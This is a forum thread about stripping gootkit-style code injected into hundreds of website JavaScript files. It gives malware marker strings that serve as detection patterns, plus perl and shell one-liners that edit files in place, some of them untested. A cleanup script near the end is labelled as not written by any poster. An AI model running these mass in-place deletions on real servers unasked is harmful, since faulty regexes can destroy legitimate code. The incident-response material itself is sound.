How to remove the last 3 lines from many files?


 
# 15  
Old 06-27-2012
Try this:

Code:
find /vhost -type f -name '*.js' -print0 |   
  xargs -0 perl -i -0777pe'
    s|(.*)/\*km0ae9gr6m\*/.*|$1\n|s
   '

This User Gave Thanks to radoulov For This Post:
# 16  
Old 06-27-2012
Quote:
Originally Posted by MaRiOsGR
but I've found a "bug" (I'm the fault),
I've found that in 5% of the .js files the code I want to remove/erase
was not added in the last 3 lines but in the same line as the rest of the normal javascript code.
the exact hack code starts with
Code:
/*km0ae9gr6m*/

Is it possible to remove everything after this code in all files that contain it?
You ought to provide a sample of what the data looks like, instead of expecting everyone to work blindly. Since you cannot solve the problem yourself, you are probably not competent to judge what is and is not important (that is not meant as an insult, just a statement of fact that applies to us all when we can't solve a problem). Giving us as much information as possible helps us provide a better solution in less time.

As a general rule, don't ask people to work from textual descriptions of data. Always provide realistic data (for input and output) and take some time before creating a thread to consider all the special 5% cases that may present themselves. We are volunteering our time to you; don't make us work harder than necessary.

Regards,
Alister

---------- Post updated at 07:36 AM ---------- Previous update was at 07:21 AM ----------

Quote:
Originally Posted by radoulov
Try this:

Code:
find /vhost -type f -name '*.js' -print0 |   
  xargs -0 perl -i -0777pe'
    s|(.*)/\*km0ae9gr6m\*/.*|$1\n|s
   '

I don't think that will give the correct result if /*km0ae9gr6m*/ occurs more than once in the text to be discarded. It may very well not be an issue, but since we haven't actually seen the data, I mention it just in case.

Regards,
Alister
# 17  
Old 06-27-2012
that did the trick.

Thank you!

Quote:
Originally Posted by radoulov
Try this:

Code:
find /vhost -type f -name '*.js' -print0 |   
  xargs -0 perl -i -0777pe'
    s|(.*)/\*km0ae9gr6m\*/.*|$1\n|s
   '

---------- Post updated at 02:52 PM ---------- Previous update was at 02:44 PM ----------

Hello,
my intention was not to make your life more difficult and I'm sorry if I've done that. It is not easy to calculate every possible side effect, I'm trying my best.

The full info is this, I've found 305 js scripts that have the above hacking code

and I need to remove them. Restoring 305 files from backup manually is very hard so the best way (in my humble opinion) was to remove the hacking code,
and if anything fails then restore from the backups as the last resort.

thank you.

Quote:
Originally Posted by alister
You ought to provide a sample of what the data looks like, instead of expecting everyone to work blindly. Since you cannot solve the problem yourself, you are probably not competent to judge what is and is not important (that is not meant as an insult, just a statement of fact that applies to us all when we can't solve a problem). Giving us as much information as possible helps us provide a better solution in less time.

As a general rule, don't ask people to work from textual descriptions of data. Always provide realistic data (for input and output) and take some time before creating a thread to consider all the special 5% cases that may present themselves. We are volunteering our time to you; don't make us work harder than necessary.

Regards,
Alister

---------- Post updated at 07:36 AM ---------- Previous update was at 07:21 AM ----------



I don't think that will give the correct result if /*km0ae9gr6m*/ occurs more than once in the text to be discarded. It may very well not be an issue, but since we haven't actually seen the data, I mention it just in case.

Regards,
Alister
# 18  
Old 06-27-2012
Quote:
Originally Posted by MaRiOsGR
my intention was not to make your life more difficult and I'm sorry if I've done that. It is not easy to calculate every possible side effect, I'm trying my best.
No need for an apology. Since I did not submit a suggestion, my life wasn't made more difficult. Further, I realize that sometimes, despite doing our best, unforeseen complications arise. Sadly, some people don't even make an effort (not saying you are one of those).

Regards,
Alister
# 19  
Old 07-05-2012
Hi all, newbie here

I also have an issue with this code injection across all js files on 70 domains.
As the alien code always starts with km0ae9gr6m and ends in qhk6sa6g1c with lots of virus code in between.
Is there not a way to SSH in and scan all files in vhosts directory and say...
find km0ae9gr6m and delete this up to and including qhk6sa6g1c?

This way I'll be able to remove all alien code through SSH?

Is that possible and please excuse my limited knowledge on SSH and commands.

Please please help me out here.

Thanks
# 20  
Old 07-05-2012
Be careful Googling. Some sites I found were infected, though Google was not warning on every one of them.

After Googling /*km0ae9gr6m*/ it has become clear that this is a widespread problem. Some mention that the malicious code start string can also be /*gootkitstart*/ .

Similarly the end string can be /*qhk6sa6g1c*/ or /*gootkitend*/ .

Many other boards mention Ubuntu 8.04 LTS with Plesk. Many mention just Plesk. There is a suggestion that the hackers are using valid ftp accounts and passwords. Others suggest that Plesk is being hacked directly even when supposedly restricted to certain IP addresses. Some suggest using IP Tables to control access.



Ps. Was my sed idea in the other thread any good?
https://www.unix.com/shell-programmin...-js-files.html
@alister
There is sample data on the other thread.

Last edited by methyl; 07-05-2012 at 02:00 PM..
# 21  
Old 07-05-2012
Untested:

Code:
find /vhost -type f -name '*.js' -print0 |
  xargs -0 perl -i -0777pe'
    # {} delimiters: with s|...|...| the alternation "|" would end the pattern
    s{/\*(km0ae9gr6m|gootkitstart)\*/.*?/\*(qhk6sa6g1c|gootkitend)\*/}{}gs
   '
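
A marker-to-marker cleanup along the lines discussed in this thread, as an added example that is not code from any poster: it removes every block between a start and an end marker (including blocks that share a line with legitimate code), refuses to alter a file whose start marker has no end marker, and keeps the originals outside the web root. The function names, the backup directory argument and the awk approach are assumptions of this example.

```shell
# Added example. Marker strings are the ones quoted in this thread.
# strip_injected FILE: print FILE with every start..end marker block removed.
# Exit status 3: a start marker has no end marker, nothing is printed.
strip_injected() {
  awk '
    BEGIN {
      ns = split("/*km0ae9gr6m*/ /*gootkitstart*/", S, " ")
      ne = split("/*qhk6sa6g1c*/ /*gootkitend*/", E, " ")
    }
    # Position of the earliest marker from arr in hay (0 if none); sets mlen.
    function first(hay, arr, n,   i, p, best) {
      best = 0
      for (i = 1; i <= n; i++) {
        p = index(hay, arr[i])          # literal match, no regex escaping
        if (p && (!best || p < best)) { best = p; mlen = length(arr[i]) }
      }
      return best
    }
    { buf = buf $0 "\n" }               # slurp: a block may span lines
    END {
      while ((s = first(buf, S, ns)) > 0) {
        out = out substr(buf, 1, s - 1) # keep legitimate code before the block
        buf = substr(buf, s + mlen)
        e = first(buf, E, ne)
        if (!e) exit 3                  # unterminated: do not guess the end
        buf = substr(buf, e + mlen)
      }
      printf "%s", out buf
    }
  ' "$1"
}

# clean_tree WEBROOT BACKUPDIR: clean infected *.js files in place, keeping
# the originals under BACKUPDIR. Assumes no newlines in file names.
clean_tree() {
  find "$1" -type f -name '*.js' \
    -exec grep -lF -e '/*km0ae9gr6m*/' -e '/*gootkitstart*/' {} + |
  while IFS= read -r f; do
    if strip_injected "$f" > "$f.tmp$$"; then
      mkdir -p "$2/$(dirname "$f")" && cp -p "$f" "$2/$f" &&
        cat "$f.tmp$$" > "$f" && echo "cleaned: $f"
    else
      echo "REVIEW, start marker without end marker: $f"
    fi
    rm -f "$f.tmp$$"
  done
}

if [ "$#" -eq 2 ]; then clean_tree "$1" "$2"; fi
```

Files reported as REVIEW are left byte-for-byte unchanged, so they can be restored from backup or inspected by hand. A cleaned file gains a trailing newline if it had none.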
